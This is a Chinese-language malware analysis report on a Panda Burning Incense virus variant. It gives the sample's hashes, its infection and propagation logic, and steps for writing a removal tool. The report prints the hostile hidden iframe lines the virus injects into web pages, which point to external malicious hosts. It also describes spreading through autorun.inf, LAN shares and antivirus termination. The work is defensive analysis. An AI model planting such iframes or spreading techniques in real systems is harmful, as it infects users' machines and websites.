熊猫烧香变种病毒分析分析报告
| 样本名 | 2_dump_SCY.exe(熊猫烧香) |
|---|---|
| 作者 | yusakul |
| 时间 | 2018-07-13 |
| 平台 | Win7-32 |
1.样本概况
1.1 样本信息
| 病毒名称 | 2_dump_SCY.exe |
|---|---|
| 所属家族 | 熊猫烧香 |
| 样本名称 | 0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768 |
| 样本类型 | PE |
| 样本大小 | 98816 bytes |
| MD5值 | b8f8e75c9e77743a61bbea9ccbcffd5d |
| SHA1值 | 188fc8fc580c0ea4bf8a8900a3d36471823c8923 |
| CRC32 | E63D45D3 |
| SHA256 | 0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768 |
| SSDeep | 3072:apAja0pSLwYqK6hVZ7N4bdq4a53YKCOTpc:a2ja0pShqK65ZOq4QYK1m |
1.2 病毒行为
| 设置注册表实现自启动 |
|---|
| 修改资源管理器(explorer)的文件夹的隐藏属性 |
| 将进程的内存属性修改为可执行或可写 |
| 想系统服务发送控制码 |
| 删除服务 |
| 对指定运行的进程感兴趣 |
1.2 测试环境及工具
| 工具 | 备注 |
|---|---|
| VMware® Workstation 14 Pro | 分析环境win7_x32 |
| 火绒剑 | 行为监控 |
| IDA pro 7.0 | 静态分析 |
| Ollydbg | 动态分析 |
1.3 分析目标
1.3.1 查看PE文件
1. kernel32.dll文件导入函数
可以看出导入的这些函数都是进程、文件相关的API函数。
2. Advapi32.dll
Advapi32.dll是一个高级API应用程序接口。包括了函数与对象的安全性,注册表的操控以及事件日志相关的API函数。
这些函数主要包括三类:注册表相关函数,进程权限修改函数,服务相关函数。
3. Mpr.dll
Mpr.dll是windows操作系统网络通信相关模块。
Wsock.dll windows socket相关API接口。
WNetAddConnection2A创建一个网络资源的链接。
URLDownloadToFileA从指定的URL读取内容写入到文件中。
由上述的导入表分析可知,该病毒程序的主要功能包括:文件读写、注册表修改、进程权限修改,网络链接,URL等。
1.3.2 火绒剑监控 - 文件操作
1. 创建自我备份在根目录
2. 创建并释放隐藏文件Desktop_.ini
3. 自我复制
1.3.2火绒剑监控 - 注册表操作
1. 无效“显示所有文件和文件夹”功能
2. 删除杀毒软件自启项
3. 修改文件
使用notepad++查看被修改的文件,被新添加了一行:
<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>
将该网址提交微步在线分析如下
1.3.3 火绒剑监控 - 网络操作
1. 扫描并尝试连接局域网脑内139、445端口
因为本次分析是在虚拟机封闭分析,所以没有连接其他主机,猜测此病毒连接成功后,会向其他主机发送自己,达到传播目的。
2. 尝试连接外网IP,并发送数据包
数据内容如下:
1.3.4火绒剑监控 - 进程操作
1. 遍历系统进程并启动自释放文件
2.具体行为分析
2.1 主要行为
2.1.1 恶意程序对用户造成的危害
1. 替换程序图标
2. 隐藏文件
3. 有目录创建Desktop_.ini文件,内容为当前时间(2018-7-11)。
- 大量用户软件被修改,无法正常运行
2.2 恶意代码分析
2.2.1 恶意代码树结构图
2.2.1 恶意代码IDA结构图
两次对比字符串是否相等,不相等则退出, 验证完成后有三个主要的恶意行为函数
2.2.2 主要功能函数sub_40819C – 复制
此函数主要功能为自我复制到系统目录并执行复制体。
1.查找系统目录下是否存在Desktop.ini文件,有则删除
2.检测病毒spc0lsv.exe
病毒会通过检查文件路径、病毒感染标志来确定进当前病毒属于以下三种情况的哪一种情况。
分别进程本身属于原始病毒文件、被感染的可执行文件、以及伪装目标进程三种情况。
(1)原始病毒文件
拷贝自身到
~/system32/driver/目录,重命名为spc0lsv.exe并运行,然后结束当前进程。
(2)当前程序时是被感染的可执行文件
1)在当前目录释放被感染的原始文件
2)删除系统目录下spo0lav
3)将创建病毒程序拷贝到系统目录,并执行。
(3)当前运行路径为系统根目录,说明当前是在伪装成系统程序状态下运行的,没有敏感操作。
2.2.3 主要功能函数sub_40D18C – 感染
此函数为感染传播函数。
该函数由3个主要函数,第一个执行感染功能,第二个实现自我复制,第三个局域网传播自身。
感染文件线程
(1)遍历文件夹,判断是否为文件夹,判断目录下是否存在Desktop_.ini文件。
判断是否存在Desktop_.ini
(2)若目录下存在Desktop_.ini,获取当前系统时间,对比Desktop_.ini中的时间,是同一天则表示此目录已被感染,跳过此目录。
若不同则在此目录下生成新的Desktop_.ini,写入本地时间。
(3)删除GHO备份
(4)感染PE文件 – 感染方式1
将病毒内容直接覆盖到要感染程序,感染目标文件后缀类型有:EXE、SCR、PIF、COM。
f_HackWay1:
(5)感染PE文件 – 感染方式2
网页感染:感染目标文件后缀类型有:htm, html, asp, php, jsp, aspx。
主要将字符串(<iframe src=http://www.krvkr.com/worm.htm width=0
height=0></iframe>)添加到文件末尾。
f_HackWays:
2. 自我复制 - 时钟周期6s
检索各个磁盘的根目录是否存在setup.exe和autorun.inf文件,存在则删除它们。
将自身复制到 盘符:\setup.exe
遍历磁盘, 创建“盘符:\autorun.inf”文件。
设置setup.exe文件属性为 <系统,隐藏>
设置autorun.inf文件属性为 <系统,隐藏>,同时将setup.exe设置为自启
3. 局域网传播
2.2.4 主要功能函数sub_40D088 – 其他
此函数主要功能为通过修改注册表实现自我保护,连接网站实现自我更新等功能。
该函数中设置了6个时钟周期,定时执行不同的功能。
TimerFunc_1(1s)
(1)提升进程权限
(2)遍历窗口名, 向指定窗口名发送QUIT消息, 并结束指定进程,大多为杀毒防护软件。
(3)扫描进程,如果有检测到以下进程则结束它,下图为部分截图:
(4)修改注册表,设置spo0lsv.exe开机启动,设置文件(夹)隐藏
TimerFunc_2(1200s)
通过URL地址更新
TimerFunc_3(10s)
(1)通过URL地址更新
(2)删除网络共享:net share ipc$ /del 删除ipc$共享
(3)关闭当前时钟
4. TimerFunc_4(6s)
将杀毒软件服务停止,并删除注册表启动项。
TimerFunc_5(10s)
字符串被加密操作过,根据特征猜测可能是网址,似乎是对一些网址做了操作。
TimerFunc_6(180s)
仍然是从某个网址上下载文件,应该不是关键操作。
3.解决方案
3.1 病毒行为
病毒行为1:病毒本身创建了名为“spo01sv.exe”的进程,该进程文件的路径为“C:\WINDOWS\system32\drivers\spo01sv.exe”。
病毒行为2:在注册表KCU\Software\Microsoft\Windows\CurrentVersio
n\Run”中创建“svcshare”,用于在开机时启动位于“C:\WINDOWS\system3
2\drivers\spo0lsv.exe”的病毒程序。
病毒行为3:修改注册表,使得隐藏文件无法通过普通的设置进行显示,该位置为HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Adva
nced\Folder\Hidden\SHOWALL,病毒将CheckedValue的键值设置为了0。
病毒行为4:将自身拷贝到根目录,并命名为“setup.exe”,同时创建“autorun.inf”用于病毒的启动,这两个文件的属性都是“隐藏”。
病毒行为5:在一些目录中创建名为“Desktop_.ini”的隐藏文件。
3.2 杀毒工具编写步骤
3.2.1 终止病毒进程
利用ToolHelpAPI获得快照句柄,而后再利用Process32First和Process32Next枚举当前的进程,枚举的过程当中获取结构体ProcessEntry32这个结构体里面的相关信息(包括进程名和进程ID);
找到目标进程之后,利用OpenProcess获取当前的进程句柄,最后再利用TerminateProcess终止病毒进程.
3.2.2. 删除文件
调用函数Bool DeleteFile (LPCTSTR
lpFilename),把lpFilename设为要指向删除的文件的文件名的指针即可,可以包含具体路径。
3.2.3 修复注册表,删除启动启动项
RegOpenKeyEx()打开目标主键,并返回句柄,然后利用RegSetValueEx进行修改键值,最后可以利用RegSetValueEx来删除键值,最后利用RegCloseKey来进行关闭。
3.2.3 查杀工具链接
我的GitHub·https://github.com/yusakul/PandaKiller
3.2.4 工具截图
